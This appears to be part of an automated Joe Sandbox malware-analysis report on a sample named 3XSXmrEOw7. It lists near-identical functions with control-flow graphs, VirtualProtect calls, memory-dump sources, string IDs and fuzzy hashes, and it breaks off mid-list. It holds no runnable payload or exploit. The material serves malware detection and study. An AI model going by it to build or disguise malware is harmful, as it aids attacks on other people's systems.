                                                                                                                                              • Instruction ID: ea58bfbc0dd8c397f22414f43d59e966c6f640d547af9d12bb140abd4150adc7
                                                                                                                                              • Opcode Fuzzy Hash: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                                              • Instruction Fuzzy Hash: 08D123B2D082649AF7208624DC44BEB7A69DF50314F1440FED94D662C1DABE1FC68B67
                                                                                                                                              Function 004075C0 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 378COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 936 4075c0-4075d7 938 407619 936->938 939 4075d9-407631 936->939 938->938 944 4076d3-407714 call 407716 939->944 945 407637-407690 939->945 945->944 950 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 945->950 976 408828-408a77 call 4089ff 950->976 977 4094b9-4095cb call 4094db call 40950b call 4095cc 950->977 993 408a79-408ab5 976->993 994 408aba-408ae7 call 408ae8 976->994 1007 409f60-409f62 ExitProcess 977->1007 1003 408e4f-408e56 993->1003 994->1003 1004 408e58-408e94 1003->1004 1005 408e99-408ecf call 408ed1 1003->1005 1004->1007 1005->1007
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                                              • Instruction ID: c3c9fe27aa97eefe4607321597f7646c91d95a2a7d095fabcd85beefab367c0e
                                                                                                                                              • Opcode Fuzzy Hash: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                                              • Instruction Fuzzy Hash: AAD135B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67
                                                                                                                                              Function 004075E0 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 374COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1080 4075e0-407631 1083 4076d3-407714 call 407716 1080->1083 1084 407637-407690 1080->1084 1084->1083 1089 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 1084->1089 1115 408828-408a77 call 4089ff 1089->1115 1116 4094b9-4095cb call 4094db call 40950b call 4095cc 1089->1116 1132 408a79-408ab5 1115->1132 1133 408aba-408ae7 call 408ae8 1115->1133 1146 409f60-409f62 ExitProcess 1116->1146 1142 408e4f-408e56 1132->1142 1133->1142 1143 408e58-408e94 1142->1143 1144 408e99-408ecf call 408ed1 1142->1144 1143->1146 1144->1146
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                                              • Instruction ID: ba5505202cf962745bbe92fa0db4f2cdf567307ff8a9c8f7b4a3d42c12a6f098
                                                                                                                                              • Opcode Fuzzy Hash: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                                              • Instruction Fuzzy Hash: 6ED134B2C082649AF7208624DC447EB7A69DF51314F0840FED98D662C1DABE1FC6CB67
                                                                                                                                              Function 00406F0B Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 374memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1012 406f0b-406f1f 1013 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 1012->1013 1014 406f21-406f44 1012->1014 1044 408828-408a77 call 4089ff 1013->1044 1045 4094b9-4095cb call 4094db call 40950b call 4095cc 1013->1045 1018 406f52 1014->1018 1019 406f46-406f50 1014->1019 1020 406f5c-406f6f 1018->1020 1019->1020 1020->1013 1024 406fb4-406fcb call 406fd0 1020->1024 1061 408a79-408ab5 1044->1061 1062 408aba-408ae7 call 408ae8 1044->1062 1075 409f60-409f62 ExitProcess 1045->1075 1071 408e4f-408e56 1061->1071 1062->1071 1072 408e58-408e94 1071->1072 1073 408e99-408ecf call 408ed1 1071->1073 1072->1075 1073->1075
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                                              • Instruction ID: 16e97a4dc2b1b72941229be2b9302e60e6d9b11039a76407f9f1745cf537d380
                                                                                                                                              • Opcode Fuzzy Hash: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                                              • Instruction Fuzzy Hash: 13D125A2C082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                                              Function 00406C1B Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 368memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                                              • Instruction ID: e00debdacd192d099ab58c28448140415868ac13b88858dbeb5059bbadf96c13
                                                                                                                                              • Opcode Fuzzy Hash: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                                              • Instruction Fuzzy Hash: EBD127A2D082649AF7208624DC44BEB7A69DB51310F1440FED94DA72C1D6BE1FC6CBA7
                                                                                                                                              Function 004075F0 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 368COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                                              • Instruction ID: 2b20349ff3622c334264f6a588594712d4e80cc894e6c7ba1984c525794e84a0
                                                                                                                                              • Opcode Fuzzy Hash: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                                              • Instruction Fuzzy Hash: 1BD134B2C082649AF7208624DC447EB7A69DF50314F0440FED98D662C1DABE5FC6CB67
                                                                                                                                              Function 004075F8 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 368COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                                              • Instruction ID: 5bf602528398837073a20d5b518e155b67223abd0f1d5e59e04288b574140e96
                                                                                                                                              • Opcode Fuzzy Hash: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                                              • Instruction Fuzzy Hash: 22D136A2D082649AF7208624DC447EB7A69DF51314F0440FED94D672C1DABE1FC6CBA7
                                                                                                                                              Function 0040711D Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 367COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                                              • Instruction ID: cb57e4122a001d9a5aea0e5eb30d6428f4d9882cba75bea230fd897a336bee3d
                                                                                                                                              • Opcode Fuzzy Hash: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                                              • Instruction Fuzzy Hash: E6D135A2D082649AF7208624DC447EB7A69DF51310F0440FED98D672C1DABE1FC6CBA7
                                                                                                                                              Function 00407125 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 367COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
